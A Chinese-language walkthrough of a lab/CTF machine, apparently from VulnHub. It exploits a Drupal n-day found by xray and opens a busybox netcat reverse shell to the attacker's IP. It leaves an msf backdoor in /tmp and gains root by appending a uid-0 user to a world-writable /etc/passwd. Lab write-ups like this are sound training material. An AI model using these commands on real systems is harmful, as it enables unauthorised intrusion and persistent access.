难度 中

目标 root权限

首先确定靶机ip地址

netdiscover -i eth0 -r 192.168.189.0/24

kali 192.168.189.58 靶机 192.168.189.184

信息收集端口扫描

看到一个80和8080，先重点摸一下网站的内容

然后看到信息里有个robots.txt 首先就去访问一下

看到有许多不允许访问的，那必须要访问一下

先测试一下/user/register/ 路径下的文件上传的，测试了一下发现后缀名是白名单，绕过可能只能配合解析漏洞尝试了换行解析好像也不太行，另外我看系统是什么drupal可能有什么框架漏洞于是把xray给开上了没想直接扫出来

然后网上搜索一下对应的exp

直接命令执行了

既然已近突破了边界那么可以尝试进行反弹shell

试了一圈反弹shell的命令发现

busybox nc 192.168.189.58 7777 -e bash

可以反弹，竟然用的busybox

上去后本来想写个webshell的发现此目录我还没有写入的权限，只能在tmp目录下留个msf的后门

使用/bin/bash -i 升级一下shell

然后上传信息收集脚本做一下信息收集，一方面是观察有没有系统配置方面的提权漏洞，一方面也需要观察一下网站部署时留下的配置文件里面的账号密码已经一些可能管理员在家目录可能保存密码的文件

通过脚本我发现/etc/passwd是777的权限

说实话有点不敢相信真的有这么简单吗。。。

向passwd写入账号密码参考 llinux 写/etc/passwd文件添加用户-CSDN博客

在靶机上执行 openssl passwd -1 123456

生成MD5加密的密码

$1$X/L0r0Wp$SEinTv4kKFpDVAfoGcizD1

echo 'hack:$1$X/L0r0Wp$SEinTv4kKFpDVAfoGcizD1:0:0:root:/root:/bin/bash' >>/etc/passwd

写入之后使用ssh不知道为什么密码不正确还是怎么回事的登录不上。。。然后又创建了一个hack2用 openssl passwd 123456 生成密码但是任然无法ssh登录

使用/bin/bash -i 升级的shell 也无法使用su hack 切换身份，后面看了一下应该是这个shell不完全，使用

python -c "import pty;pty.spawn('/bin/bash')"

启用一个完整的shell然后su hack 输入123456 成功提权到root

其实我还尝试了直接修改passwd但是vim的编辑器会乱码。

        另外我也看了一下网上其他的打靶思路，好家伙原来正常的打靶流程竟然是主web渗透，用的任意文件读取加文件包含图片马的方式拿到webshell并且在网站的数据库配置文件中找到数据的链接账号和密码然后发现这个账号密码ssh也可以连接，流程也挺精彩的，不过论快还是没有我这种快，其实当我看到web网站有那么多功能点我就感觉需要在网站上花挺多时间了，不过我平时更倾向于红队的打点思路于是直接上工具梭拿到nday就突破边界进去了。

        打了这么多的靶机从一开始照着视频一步一步的执行到现在自己思考拿下靶机再看看其他人的思路也不为是很大的进步了。vulnhub的系列可能不会长久，后续可能会向tryhackme 或者hackthebox方向去追求更全的靶机，以及会开始着手红日靶机也就是Windows方面的靶场了。